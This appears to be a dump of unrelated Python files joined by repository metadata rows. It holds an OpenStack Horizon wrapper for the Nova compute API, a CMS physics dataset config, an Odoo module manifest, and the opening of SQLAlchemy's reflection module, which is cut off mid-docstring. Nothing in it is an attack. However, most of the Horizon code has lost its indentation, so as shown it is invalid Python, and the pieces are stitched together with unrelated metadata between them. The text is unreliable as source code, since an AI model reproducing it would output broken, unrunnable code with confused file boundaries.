def get(self, sg_id):
return SecurityGroup(self.client.security_groups.get(sg_id))
def create(self, name, desc):
return SecurityGroup(self.client.security_groups.create(name, desc))
def update(self, sg_id, name, desc):
return SecurityGroup(self.client.security_groups.update(sg_id,
name, desc))
def delete(self, security_group_id):
self.client.security_groups.delete(security_group_id)
def rule_create(self, parent_group_id,
direction=None, ethertype=None,
ip_protocol=None, from_port=None, to_port=None,
cidr=None, group_id=None):
# Nova Security Group API does not use direction and ethertype fields.
try:
sg = self.client.security_group_rules.create(parent_group_id,
ip_protocol,
from_port,
to_port,
cidr,
group_id)
except nova_exceptions.BadRequest:
raise horizon_exceptions.Conflict(
_('Security group rule already exists.'))
return SecurityGroupRule(sg)
def rule_delete(self, security_group_rule_id):
self.client.security_group_rules.delete(security_group_rule_id)
def list_by_instance(self, instance_id):
"""Gets security groups of an instance."""
# TODO(gabriel): This needs to be moved up to novaclient, and should
# be removed once novaclient supports this call.
security_groups = []
nclient = self.client
resp, body = nclient.client.get('/servers/%s/os-security-groups'
% instance_id)
if body:
# Wrap data in SG objects as novaclient would.
sg_objs = [
nova_security_groups.SecurityGroup(
nclient.security_groups, sg, loaded=True)
for sg in body.get('security_groups', [])]
# Then wrap novaclient's object with our own. Yes, sadly wrapping
# with two layers of objects is necessary.
security_groups = [SecurityGroup(sg) for sg in sg_objs]
return security_groups
def update_instance_security_group(self, instance_id,
new_security_group_ids):
try:
all_groups = self.list()
except Exception:
raise Exception(_("Couldn't get security group list."))
wanted_groups = set([sg.name for sg in all_groups
if sg.id in new_security_group_ids])
try:
current_groups = self.list_by_instance(instance_id)
except Exception:
raise Exception(_("Couldn't get current security group "
"list for instance %s.")
% instance_id)
current_group_names = set([sg.name for sg in current_groups])
groups_to_add = wanted_groups - current_group_names
groups_to_remove = current_group_names - wanted_groups
num_groups_to_modify = len(groups_to_add | groups_to_remove)
try:
for group in groups_to_add:
self.client.servers.add_security_group(instance_id, group)
num_groups_to_modify -= 1
for group in groups_to_remove:
self.client.servers.remove_security_group(instance_id, group)
num_groups_to_modify -= 1
except nova_exceptions.ClientException as err:
LOG.error(_("Failed to modify %(num_groups_to_modify)d instance "
"security groups: %(err)s") %
dict(num_groups_to_modify=num_groups_to_modify,
err=err))
# reraise novaclient.exceptions.ClientException, but with
# a sanitized error message so we don't risk exposing
# sensitive information to the end user. This has to be
# novaclient.exceptions.ClientException, not just
# Exception, since the former is recognized as a
# "recoverable" exception by horizon, and therefore the
# error message is passed along to the end user, while
# Exception is swallowed alive by horizon and a generic
# error message is given to the end user
raise nova_exceptions.ClientException(
err.code,
_("Failed to modify %d instance security groups") %
num_groups_to_modify)
return True
class FlavorExtraSpec(object):
def __init__(self, flavor_id, key, val):
self.flavor_id = flavor_id
self.id = key
self.key = key
self.value = val
class FloatingIp(base.APIResourceWrapper):
_attrs = ['id', 'ip', 'fixed_ip', 'port_id', 'instance_id',
'instance_type', 'pool']
def __init__(self, fip):
fip.__setattr__('port_id', fip.instance_id)
fip.__setattr__('instance_type',
'compute' if fip.instance_id else None)
super(FloatingIp, self).__init__(fip)
class FloatingIpPool(base.APIDictWrapper):
def __init__(self, pool):
pool_dict = {'id': pool.name,
'name': pool.name}
super(FloatingIpPool, self).__init__(pool_dict)
class FloatingIpTarget(base.APIDictWrapper):
def __init__(self, server):
server_dict = {'name': '%s (%s)' % (server.name, server.id),
'id': server.id}
super(FloatingIpTarget, self).__init__(server_dict)
class FloatingIpManager(network_base.FloatingIpManager):
def __init__(self, request):
self.request = request
self.client = novaclient(request)
def list_pools(self):
return [FloatingIpPool(pool)
for pool in self.client.floating_ip_pools.list()]
def list(self):
return [FloatingIp(fip)
for fip in self.client.floating_ips.list()]
def get(self, floating_ip_id):
return FloatingIp(self.client.floating_ips.get(floating_ip_id))
def allocate(self, pool):
return FloatingIp(self.client.floating_ips.create(pool=pool))
def release(self, floating_ip_id):
self.client.floating_ips.delete(floating_ip_id)
def associate(self, floating_ip_id, port_id):
# In Nova implied port_id is instance_id
server = self.client.servers.get(port_id)
fip = self.client.floating_ips.get(floating_ip_id)
self.client.servers.add_floating_ip(server.id, fip.ip)
def disassociate(self, floating_ip_id):
fip = self.client.floating_ips.get(floating_ip_id)
server = self.client.servers.get(fip.instance_id)
self.client.servers.remove_floating_ip(server.id, fip.ip)
def list_targets(self):
return [FloatingIpTarget(s) for s in self.client.servers.list()]
def get_target_id_by_instance(self, instance_id, target_list=None):
return instance_id
def list_target_id_by_instance(self, instance_id, target_list=None):
return [instance_id, ]
def is_simple_associate_supported(self):
return conf.HORIZON_CONFIG["simple_ip_management"]
def is_supported(self):
return True
@memoized
def policy_list(request):
return novaclient(request).policys.list()
@memoized
def novaclient(request):
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
c = nova_client.Client(VERSIONS.get_active_version()['version'],
request.user.username,
request.user.token.id,
project_id=request.user.tenant_id,
auth_url=base.url_for(request, 'compute'),
insecure=insecure,
cacert=cacert,
http_log_debug=settings.DEBUG)
c.client.auth_token = request.user.token.id
c.client.management_url = base.url_for(request, 'compute')
return c
def server_vnc_console(request, instance_id, console_type='novnc'):
return VNCConsole(novaclient(request).servers.get_vnc_console(
instance_id, console_type)['console'])
def server_spice_console(request, instance_id, console_type='spice-html5'):
return SPICEConsole(novaclient(request).servers.get_spice_console(
instance_id, console_type)['console'])
def server_rdp_console(request, instance_id, console_type='rdp-html5'):
return RDPConsole(novaclient(request).servers.get_rdp_console(
instance_id, console_type)['console'])
def server_serial_console(request, instance_id, console_type='serial'):
return SerialConsole(novaclient(request).servers.get_serial_console(
instance_id, console_type)['console'])
def flavor_create(request, name, memory, vcpu, disk, cache=0, flavorid='auto',
                  ephemeral=0, swap=0, metadata=None, is_public=True,
                  rxtx_factor=1):
    flavor = novaclient(request).flavors.create(name, memory, vcpu, disk,
                                                cache, flavorid=flavorid,
                                                ephemeral=ephemeral,
                                                swap=swap, is_public=is_public,
                                                rxtx_factor=rxtx_factor)
    if metadata:
        flavor_extra_set(request, flavor.id, metadata)
    return flavor
def flavor_delete(request, flavor_id):
novaclient(request).flavors.delete(flavor_id)
def flavor_get(request, flavor_id, get_extras=False):
flavor = novaclient(request).flavors.get(flavor_id)
if get_extras:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return flavor
@memoized
def flavor_list(request, is_public=True, get_extras=False):
"""Get the list of available instance sizes (flavors)."""
flavors = novaclient(request).flavors.list(is_public=is_public)
if get_extras:
for flavor in flavors:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return flavors
def update_pagination(entities, page_size, marker, sort_dir, sort_key,
reversed_order):
has_more_data = has_prev_data = False
if len(entities) > page_size:
has_more_data = True
entities.pop()
if marker is not None:
has_prev_data = True
# first page condition when reached via prev back
elif reversed_order and marker is not None:
has_more_data = True
# last page condition
elif marker is not None:
has_prev_data = True
# restore the original ordering here
if reversed_order:
entities = sorted(entities, key=lambda entity:
(getattr(entity, sort_key) or '').lower(),
reverse=(sort_dir == 'asc'))
return entities, has_more_data, has_prev_data
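# A hedged usage sketch of update_pagination() (the client call below is
# illustrative, not part of this module): fetch page_size + 1 rows so the
# extra row can signal a following page; a non-None marker means the caller
# navigated here from a previous page.
#
#   rows = client.list(limit=20 + 1, marker=marker)
#   rows, has_more, has_prev = update_pagination(
#       rows, 20, marker, 'desc', 'name', reversed_order=False)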
@memoized
def flavor_list_paged(request, is_public=True, get_extras=False, marker=None,
paginate=False, sort_key="name", sort_dir="desc",
reversed_order=False):
"""Get the list of available instance sizes (flavors)."""
has_more_data = False
has_prev_data = False
if paginate:
if reversed_order:
sort_dir = 'desc' if sort_dir == 'asc' else 'asc'
page_size = utils.get_page_size(request)
flavors = novaclient(request).flavors.list(is_public=is_public,
marker=marker,
limit=page_size + 1,
sort_key=sort_key,
sort_dir=sort_dir)
flavors, has_more_data, has_prev_data = update_pagination(
flavors, page_size, marker, sort_dir, sort_key, reversed_order)
else:
flavors = novaclient(request).flavors.list(is_public=is_public)
if get_extras:
for flavor in flavors:
flavor.extras = flavor_get_extras(request, flavor.id, True, flavor)
return (flavors, has_more_data, has_prev_data)
@memoized
def flavor_access_list(request, flavor=None):
"""Get the list of access instance sizes (flavors)."""
return novaclient(request).flavor_access.list(flavor=flavor)
def add_tenant_to_flavor(request, flavor, tenant):
"""Add a tenant to the given flavor access list."""
return novaclient(request).flavor_access.add_tenant_access(
flavor=flavor, tenant=tenant)
def remove_tenant_from_flavor(request, flavor, tenant):
"""Remove a tenant from the given flavor access list."""
return novaclient(request).flavor_access.remove_tenant_access(
flavor=flavor, tenant=tenant)
def flavor_get_extras(request, flavor_id, raw=False, flavor=None):
"""Get flavor extra specs."""
if flavor is None:
flavor = novaclient(request).flavors.get(flavor_id)
extras = flavor.get_keys()
if raw:
return extras
return [FlavorExtraSpec(flavor_id, key, value) for
key, value in extras.items()]
def flavor_extra_delete(request, flavor_id, keys):
"""Unset the flavor extra spec keys."""
flavor = novaclient(request).flavors.get(flavor_id)
return flavor.unset_keys(keys)
def flavor_extra_set(request, flavor_id, metadata):
"""Set the flavor extra spec keys."""
flavor = novaclient(request).flavors.get(flavor_id)
if (not metadata): # not a way to delete keys
return None
return flavor.set_keys(metadata)
def snapshot_create(request, instance_id, name):
return novaclient(request).servers.create_image(instance_id, name)
def keypair_create(request, name):
return novaclient(request).keypairs.create(name)
def keypair_import(request, name, public_key):
return novaclient(request).keypairs.create(name, public_key)
def keypair_delete(request, keypair_id):
novaclient(request).keypairs.delete(keypair_id)
def keypair_list(request):
return novaclient(request).keypairs.list()
def keypair_get(request, keypair_id):
return novaclient(request).keypairs.get(keypair_id)
def server_create(request, name, image, flavor, key_name, user_data,
security_groups, block_device_mapping=None,
block_device_mapping_v2=None, nics=None,
availability_zone=None, instance_count=1, admin_pass=None,
disk_config=None, config_drive=None, meta=None):
return Server(novaclient(request).servers.create(
name, image, flavor, userdata=user_data,
security_groups=security_groups,
key_name=key_name, block_device_mapping=block_device_mapping,
block_device_mapping_v2=block_device_mapping_v2,
nics=nics, availability_zone=availability_zone,
min_count=instance_count, admin_pass=admin_pass,
disk_config=disk_config, config_drive=config_drive,
meta=meta), request)
def server_delete(request, instance):
novaclient(request).servers.delete(instance)
def server_get(request, instance_id):
return Server(novaclient(request).servers.get(instance_id), request)
def server_list(request, search_opts=None, all_tenants=False):
page_size = utils.get_page_size(request)
c = novaclient(request)
paginate = False
if search_opts is None:
search_opts = {}
elif 'paginate' in search_opts:
paginate = search_opts.pop('paginate')
if paginate:
search_opts['limit'] = page_size + 1
if all_tenants:
search_opts['all_tenants'] = True
else:
search_opts['project_id'] = request.user.tenant_id
servers = [Server(s, request)
for s in c.servers.list(True, search_opts)]
has_more_data = False
if paginate and len(servers) > page_size:
servers.pop(-1)
has_more_data = True
elif paginate and len(servers) == getattr(settings, 'API_RESULT_LIMIT',
1000):
has_more_data = True
return (servers, has_more_data)
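# Hedged usage sketch for server_list(): 'paginate' caps the query at
# page_size + 1 rows; any other keys (the 'marker' below is illustrative)
# are forwarded to the Nova API unchanged.
#
#   servers, has_more = server_list(
#       request, search_opts={'paginate': True, 'marker': last_seen_id})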
def server_console_output(request, instance_id, tail_length=None):
"""Gets console output of an instance."""
return novaclient(request).servers.get_console_output(instance_id,
length=tail_length)
def server_pause(request, instance_id):
novaclient(request).servers.pause(instance_id)
def server_unpause(request, instance_id):
novaclient(request).servers.unpause(instance_id)
def server_suspend(request, instance_id):
novaclient(request).servers.suspend(instance_id)
def server_resume(request, instance_id):
novaclient(request).servers.resume(instance_id)
def server_shelve(request, instance_id):
novaclient(request).servers.shelve(instance_id)
def server_unshelve(request, instance_id):
novaclient(request).servers.unshelve(instance_id)
def server_reboot(request, instance_id, soft_reboot=False):
hardness = nova_servers.REBOOT_HARD
if soft_reboot:
hardness = nova_servers.REBOOT_SOFT
novaclient(request).servers.reboot(instance_id, hardness)
def server_rebuild(request, instance_id, image_id, password=None,
disk_config=None):
return novaclient(request).servers.rebuild(instance_id, image_id,
password, disk_config)
def server_update(request, instance_id, name):
return novaclient(request).servers.update(instance_id, name=name)
def server_migrate(request, instance_id):
novaclient(request).servers.migrate(instance_id)
def server_live_migrate(request, instance_id, host, block_migration=False,
disk_over_commit=False):
novaclient(request).servers.live_migrate(instance_id, host,
block_migration,
disk_over_commit)
def server_resize(request, instance_id, flavor, disk_config=None, **kwargs):
novaclient(request).servers.resize(instance_id, flavor,
disk_config, **kwargs)
def server_confirm_resize(request, instance_id):
novaclient(request).servers.confirm_resize(instance_id)
def server_revert_resize(request, instance_id):
novaclient(request).servers.revert_resize(instance_id)
def server_start(request, instance_id):
novaclient(request).servers.start(instance_id)
def server_stop(request, instance_id):
novaclient(request).servers.stop(instance_id)
def server_lock(request, instance_id):
novaclient(request).servers.lock(instance_id)
def server_unlock(request, instance_id):
novaclient(request).servers.unlock(instance_id)
def server_metadata_update(request, instance_id, metadata):
novaclient(request).servers.set_meta(instance_id, metadata)
def server_metadata_delete(request, instance_id, keys):
novaclient(request).servers.delete_meta(instance_id, keys)
def tenant_quota_get(request, tenant_id):
return base.QuotaSet(novaclient(request).quotas.get(tenant_id))
def tenant_quota_update(request, tenant_id, **kwargs):
novaclient(request).quotas.update(tenant_id, **kwargs)
def default_quota_get(request, tenant_id):
return base.QuotaSet(novaclient(request).quotas.defaults(tenant_id))
def default_quota_update(request, **kwargs):
novaclient(request).quota_classes.update(DEFAULT_QUOTA_NAME, **kwargs)
def usage_get(request, tenant_id, start, end):
return NovaUsage(novaclient(request).usage.get(tenant_id, start, end))
def usage_list(request, start, end):
return [NovaUsage(u) for u in
novaclient(request).usage.list(start, end, True)]
def virtual_interfaces_list(request, instance_id):
return novaclient(request).virtual_interfaces.list(instance_id)
def get_x509_credentials(request):
return novaclient(request).certs.create()
def get_x509_root_certificate(request):
return novaclient(request).certs.get()
def get_password(request, instance_id, private_key=None):
return novaclient(request).servers.get_password(instance_id, private_key)
def instance_volume_attach(request, volume_id, instance_id, device):
return novaclient(request).volumes.create_server_volume(instance_id,
volume_id,
device)
def instance_volume_detach(request, instance_id, att_id):
return novaclient(request).volumes.delete_server_volume(instance_id,
att_id)
def instance_volumes_list(request, instance_id):
from openstack_dashboard.api import cinder
volumes = novaclient(request).volumes.get_server_volumes(instance_id)
for volume in volumes:
volume_data = cinder.cinderclient(request).volumes.get(volume.id)
volume.name = cinder.Volume(volume_data).name
return volumes
def hypervisor_list(request):
return novaclient(request).hypervisors.list()
def hypervisor_stats(request):
return novaclient(request).hypervisors.statistics()
def hypervisor_search(request, query, servers=True):
return novaclient(request).hypervisors.search(query, servers)
def evacuate_host(request, host, target=None, on_shared_storage=False):
# TODO(jmolle) This should be change for nova atomic api host_evacuate
hypervisors = novaclient(request).hypervisors.search(host, True)
response = []
err_code = None
for hypervisor in hypervisors:
hyper = Hypervisor(hypervisor)
# if hypervisor doesn't have servers, the attribute is not present
for server in hyper.servers:
try:
novaclient(request).servers.evacuate(server['uuid'],
target,
on_shared_storage)
except nova_exceptions.ClientException as err:
err_code = err.code
msg = _("Name: %(name)s ID: %(uuid)s")
msg = msg % {'name': server['name'], 'uuid': server['uuid']}
response.append(msg)
if err_code:
msg = _('Failed to evacuate instances: %s') % ', '.join(response)
raise nova_exceptions.ClientException(err_code, msg)
return True
def migrate_host(request, host, live_migrate=False, disk_over_commit=False,
block_migration=False):
hypervisors = novaclient(request).hypervisors.search(host, True)
response = []
err_code = None
for hyper in hypervisors:
for server in getattr(hyper, "servers", []):
try:
if live_migrate:
instance = server_get(request, server['uuid'])
# Checking that instance can be live-migrated
if instance.status in ["ACTIVE", "PAUSED"]:
novaclient(request).servers.live_migrate(
server['uuid'],
None,
block_migration,
disk_over_commit
)
else:
novaclient(request).servers.migrate(server['uuid'])
else:
novaclient(request).servers.migrate(server['uuid'])
except nova_exceptions.ClientException as err:
err_code = err.code
msg = _("Name: %(name)s ID: %(uuid)s")
msg = msg % {'name': server['name'], 'uuid': server['uuid']}
response.append(msg)
if err_code:
msg = _('Failed to migrate instances: %s') % ', '.join(response)
raise nova_exceptions.ClientException(err_code, msg)
return True
def tenant_absolute_limits(request, reserved=False):
limits = novaclient(request).limits.get(reserved=reserved).absolute
limits_dict = {}
for limit in limits:
if limit.value < 0:
# Workaround for nova bug 1370867 that absolute_limits
# returns negative value for total.*Used instead of 0.
# For such case, replace negative values with 0.
if limit.name.startswith('total') and limit.name.endswith('Used'):
limits_dict[limit.name] = 0
else:
# -1 is used to represent unlimited quotas
limits_dict[limit.name] = float("inf")
else:
limits_dict[limit.name] = limit.value
return limits_dict
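# Worked example of the mapping above (sketch values, not live data):
# raw limits {'maxTotalInstances': -1, 'totalInstancesUsed': -3} come back
# as {'maxTotalInstances': float('inf'), 'totalInstancesUsed': 0} -- the -1
# "unlimited" sentinel becomes inf, and the negative total*Used values from
# nova bug 1370867 are clamped to 0.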
def availability_zone_list(request, detailed=False):
return novaclient(request).availability_zones.list(detailed=detailed)
def service_list(request, binary=None):
return novaclient(request).services.list(binary=binary)
def service_enable(request, host, binary):
return novaclient(request).services.enable(host, binary)
def service_disable(request, host, binary, reason=None):
if reason:
return novaclient(request).services.disable_log_reason(host,
binary, reason)
else:
return novaclient(request).services.disable(host, binary)
def aggregate_details_list(request):
result = []
c = novaclient(request)
for aggregate in c.aggregates.list():
result.append(c.aggregates.get_details(aggregate.id))
return result
def aggregate_create(request, name, availability_zone=None):
return novaclient(request).aggregates.create(name, availability_zone)
def aggregate_delete(request, aggregate_id):
return novaclient(request).aggregates.delete(aggregate_id)
def aggregate_get(request, aggregate_id):
return novaclient(request).aggregates.get(aggregate_id)
def aggregate_update(request, aggregate_id, values):
return novaclient(request).aggregates.update(aggregate_id, values)
def aggregate_set_metadata(request, aggregate_id, metadata):
return novaclient(request).aggregates.set_metadata(aggregate_id, metadata)
def host_list(request):
return novaclient(request).hosts.list()
def add_host_to_aggregate(request, aggregate_id, host):
return novaclient(request).aggregates.add_host(aggregate_id, host)
def remove_host_from_aggregate(request, aggregate_id, host):
return novaclient(request).aggregates.remove_host(aggregate_id, host)
def interface_attach(request,
server, port_id=None, net_id=None, fixed_ip=None):
return novaclient(request).servers.interface_attach(server,
port_id,
net_id,
fixed_ip)
def interface_detach(request, server, port_id):
return novaclient(request).servers.interface_detach(server, port_id)
@memoized
def list_extensions(request):
"""List all nova extensions, except the ones in the blacklist."""
blacklist = set(getattr(settings,
'OPENSTACK_NOVA_EXTENSIONS_BLACKLIST', []))
return [
extension for extension in
nova_list_extensions.ListExtManager(novaclient(request)).show_all()
if extension.name not in blacklist
]
@memoized
def extension_supported(extension_name, request):
"""Determine if nova supports a given extension name.
Example values for the extension_name include AdminActions, ConsoleOutput,
etc.
"""
extensions = list_extensions(request)
for extension in extensions:
if extension.name == extension_name:
return True
return False
def can_set_server_password():
features = getattr(settings, 'OPENSTACK_HYPERVISOR_FEATURES', {})
return features.get('can_set_password', False)
def instance_action_list(request, instance_id):
return nova_instance_action.InstanceActionManager(
novaclient(request)).list(instance_id)
def can_set_mount_point():
"""Return the Hypervisor's capability of setting mount points."""
hypervisor_features = getattr(
settings, "OPENSTACK_HYPERVISOR_FEATURES", {})
return hypervisor_features.get("can_set_mount_point", False)
def requires_keypair():
features = getattr(settings, 'OPENSTACK_HYPERVISOR_FEATURES', {})
return features.get('requires_keypair', False)
| [
"[email protected]"
] | |
3a390a443f62dda7aaf9ce5b667f5dfe9dd4c376 | 9b39e32f36e4f949d617e158c5034faa9595aaf0 | /python/PHYS14/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8_cff.py | e21dd683067ea39f4ddd04af1141721dd2490d0b | [] | no_license | awhitbeck/SuSySubstructure | c24043227697f74bb85edc1cb84d65b884a141d5 | 1422a1f6e46468fdd103f92ccbdffc34468cbbd9 | refs/heads/synch_June26_2015 | 2021-01-19T07:43:59.339373 | 2015-08-16T09:35:49 | 2015-08-16T09:35:49 | 14,053,341 | 0 | 2 | null | 2015-08-08T08:24:37 | 2013-11-01T20:44:04 | Python | UTF-8 | Python | false | false | 1,133 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/7C6B4D11-AC7C-E411-8A5F-002590D0B0D8.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/C8C83950-C37C-E411-90F6-20CF305B0572.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/10000/D89A3C72-C67C-E411-9BCF-00248C9BA537.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/20000/085FCE99-877C-E411-900C-20CF3027A577.root',
'/store/mc/Phys14DR/QCD_Pt-1800to2400_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_trkalmb_PHYS14_25_V1-v2/20000/2A6589BB-A07C-E411-A137-00259074AE7A.root' ] );
secFiles.extend( [
] )
| [
"[email protected]"
] | |
80323aa0c33ac672897ee319b3f16f71e768fb5c | da47e42519b6d5eb37bdb634fd618672706e79da | /localizacion_metromed/tys_http/__manifest__.py | 5094cf573f3be281a9e1d379e90f33313dc7ee0c | [] | no_license | Tysamncaweb/produccion2 | 02bbbccefc4f4cd0d0948b1b0552d931f804fb9b | b95909d0689fc787185290565f0873040a6027cf | refs/heads/master | 2022-04-26T13:51:22.316294 | 2020-04-29T19:58:35 | 2020-04-29T19:58:35 | 260,013,639 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | # -*- coding: utf-8 -*-
{
'name': "submodules/tys_http",
'summary': """
Short (1 phrase/line) summary of the module's purpose, used as
subtitle on modules listing or apps.openerp.com""",
'description': """
Long description of module's purpose
""",
'author': "My Company",
'website': "http://www.yourcompany.com",
# Categories can be used to filter modules in modules listing
# Check https://github.com/odoo/odoo/blob/master/odoo/addons/base/module/module_data.xml
# for the full list
'category': 'Uncategorized',
'version': '0.1',
# any module necessary for this one to work correctly
'depends': ['base'],
# always loaded
'data': [
# 'security/ir.model.access.csv',
'views/views.xml',
'views/templates.xml',
],
# only loaded in demonstration mode
'demo': [
'demo/demo.xml',
],
} | [
"[email protected]"
] | |
495b2ec1563ff083c161ceed00c7cb888178ead0 | fbbaf3f4cf87d75e87c992f62f40dc198fb7b5a8 | /libs/sqlalchemy-rel_0_7/lib/sqlalchemy/engine/reflection.py | 76cb5bdaa4328f1096ba3b737ba8bc4d3d374d4c | [
"MIT"
] | permissive | sonikandpikachu/wcomp | cfe30371beb518fda9af890434a089673226df32 | b0c445bf3e2fec636eb4b5cb01ae1e2fc06ed29a | refs/heads/master | 2021-01-18T16:47:50.918828 | 2012-10-05T15:27:37 | 2012-10-05T15:27:37 | 3,497,017 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,090 | py | # engine/reflection.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provides an abstraction for obtaining database schema information.
Usage Notes:
Here are some general conventions when accessing the low level inspector
methods such as get_table_names, get_columns, etc.
1. Inspector methods return lists of dicts in most cases for the following
reasons:
* They're both standard types that can be serialized.
* Using a dict instead of a tuple allows easy expansion of attributes.
* Using a list for the outer structure maintains order and is easy to work
with (e.g. list comprehension [d['name'] for d in cols]).
2. Records that contain a name, such as the column name in a column record
use the key 'name'. So for most return values, each record will have a
'name' attribute.
"""
import sqlalchemy
from sqlalchemy import exc, sql
from sqlalchemy import util
from sqlalchemy.util import topological
from sqlalchemy.types import TypeEngine
from sqlalchemy import schema as sa_schema
@util.decorator
def cache(fn, self, con, *args, **kw):
info_cache = kw.get('info_cache', None)
if info_cache is None:
return fn(self, con, *args, **kw)
key = (
fn.__name__,
tuple(a for a in args if isinstance(a, basestring)),
tuple((k, v) for k, v in kw.iteritems() if isinstance(v, (basestring, int, float)))
)
ret = info_cache.get(key)
if ret is None:
ret = fn(self, con, *args, **kw)
info_cache[key] = ret
return ret
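# Hedged note on the cache key above: results are memoized per (method name,
# string positional args, scalar keyword args), so two dialect calls sharing
# one info_cache dict hit the database only once.
#
#   info_cache = {}
#   dialect.get_columns(conn, 'user', info_cache=info_cache)  # queries db
#   dialect.get_columns(conn, 'user', info_cache=info_cache)  # served cached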
class Inspector(object):
"""Performs database schema inspection.
The Inspector acts as a proxy to the reflection methods of the
:class:`~sqlalchemy.engine.base.Dialect`, providing a
consistent interface as well as caching support for previously
fetched metadata.
The preferred method to construct an :class:`.Inspector` is via the
:meth:`Inspector.from_engine` method. I.e.::
engine = create_engine('...')
insp = Inspector.from_engine(engine)
Where above, the :class:`~sqlalchemy.engine.base.Dialect` may opt
to return an :class:`.Inspector` subclass that provides additional
methods specific to the dialect's target database.
"""
def __init__(self, bind):
"""Initialize a new :class:`.Inspector`.
:param bind: a :class:`~sqlalchemy.engine.base.Connectable`,
which is typically an instance of
:class:`~sqlalchemy.engine.base.Engine` or
:class:`~sqlalchemy.engine.base.Connection`.
For a dialect-specific instance of :class:`.Inspector`, see
:meth:`Inspector.from_engine`
"""
# this might not be a connection, it could be an engine.
self.bind = bind
# set the engine
if hasattr(bind, 'engine'):
self.engine = bind.engine
else:
self.engine = bind
if self.engine is bind:
# if engine, ensure initialized
bind.connect().close()
self.dialect = self.engine.dialect
self.info_cache = {}
@classmethod
def from_engine(cls, bind):
"""Construct a new dialect-specific Inspector object from the given engine or connection.
:param bind: a :class:`~sqlalchemy.engine.base.Connectable`,
which is typically an instance of
:class:`~sqlalchemy.engine.base.Engine` or
:class:`~sqlalchemy.engine.base.Connection`.
        This method differs from a direct constructor call of :class:`.Inspector`
in that the :class:`~sqlalchemy.engine.base.Dialect` is given a chance to provide
a dialect-specific :class:`.Inspector` instance, which may provide additional
methods.
See the example at :class:`.Inspector`.
"""
if hasattr(bind.dialect, 'inspector'):
return bind.dialect.inspector(bind)
return Inspector(bind)
@property
def default_schema_name(self):
"""Return the default schema name presented by the dialect
for the current engine's database user.
E.g. this is typically ``public`` for Postgresql and ``dbo``
for SQL Server.
"""
return self.dialect.default_schema_name
def get_schema_names(self):
"""Return all schema names.
"""
if hasattr(self.dialect, 'get_schema_names'):
return self.dialect.get_schema_names(self.bind,
info_cache=self.info_cache)
return []
def get_table_names(self, schema=None, order_by=None):
"""Return all table names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
:param order_by: Optional, may be the string "foreign_key" to sort
the result on foreign key dependencies.
This should probably not return view names or maybe it should return
them with an indicator t or v.
"""
if hasattr(self.dialect, 'get_table_names'):
tnames = self.dialect.get_table_names(self.bind,
schema, info_cache=self.info_cache)
else:
tnames = self.engine.table_names(schema)
if order_by == 'foreign_key':
import random
random.shuffle(tnames)
tuples = []
for tname in tnames:
for fkey in self.get_foreign_keys(tname, schema):
if tname != fkey['referred_table']:
tuples.append((tname, fkey['referred_table']))
tnames = list(topological.sort(tuples, tnames))
return tnames
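    # Hedged usage sketch: order_by='foreign_key' returns the names sorted
    # on their foreign key dependencies (the shuffle above only randomizes
    # ties before the topological sort), e.g.:
    #
    #   for name in insp.get_table_names(order_by='foreign_key'):
    #       process(name)    # process() is illustrative, not part of the API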
def get_table_options(self, table_name, schema=None, **kw):
"""Return a dictionary of options specified when the table of the given name was created.
This currently includes some options that apply to MySQL tables.
"""
if hasattr(self.dialect, 'get_table_options'):
return self.dialect.get_table_options(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return {}
def get_view_names(self, schema=None):
"""Return all view names in `schema`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_names(self.bind, schema,
info_cache=self.info_cache)
def get_view_definition(self, view_name, schema=None):
"""Return definition for `view_name`.
:param schema: Optional, retrieve names from a non-default schema.
"""
return self.dialect.get_view_definition(
self.bind, view_name, schema, info_cache=self.info_cache)
def get_columns(self, table_name, schema=None, **kw):
"""Return information about columns in `table_name`.
Given a string `table_name` and an optional string `schema`, return
column information as a list of dicts with these keys:
name
the column's name
type
:class:`~sqlalchemy.types.TypeEngine`
nullable
boolean
default
the column's default value
attrs
dict containing optional column attributes
"""
col_defs = self.dialect.get_columns(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
for col_def in col_defs:
# make this easy and only return instances for coltype
coltype = col_def['type']
if not isinstance(coltype, TypeEngine):
col_def['type'] = coltype()
return col_defs
def get_primary_keys(self, table_name, schema=None, **kw):
"""Return information about primary keys in `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a list of column names.
"""
pkeys = self.dialect.get_primary_keys(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_pk_constraint(self, table_name, schema=None, **kw):
"""Return information about primary key constraint on `table_name`.
Given a string `table_name`, and an optional string `schema`, return
primary key information as a dictionary with these keys:
constrained_columns
a list of column names that make up the primary key
name
optional name of the primary key constraint.
"""
pkeys = self.dialect.get_pk_constraint(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return pkeys
def get_foreign_keys(self, table_name, schema=None, **kw):
"""Return information about foreign_keys in `table_name`.
